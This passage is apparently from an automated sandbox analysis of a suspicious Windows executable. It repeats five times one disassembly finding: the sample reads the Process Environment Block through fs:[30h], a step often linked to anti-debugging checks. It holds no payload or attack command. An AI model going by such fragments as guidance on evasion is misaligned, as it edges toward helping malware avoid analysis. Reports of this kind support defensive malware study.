          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]1_2_014152A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]1_2_014152A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]1_2_014152A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]1_2_014152A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]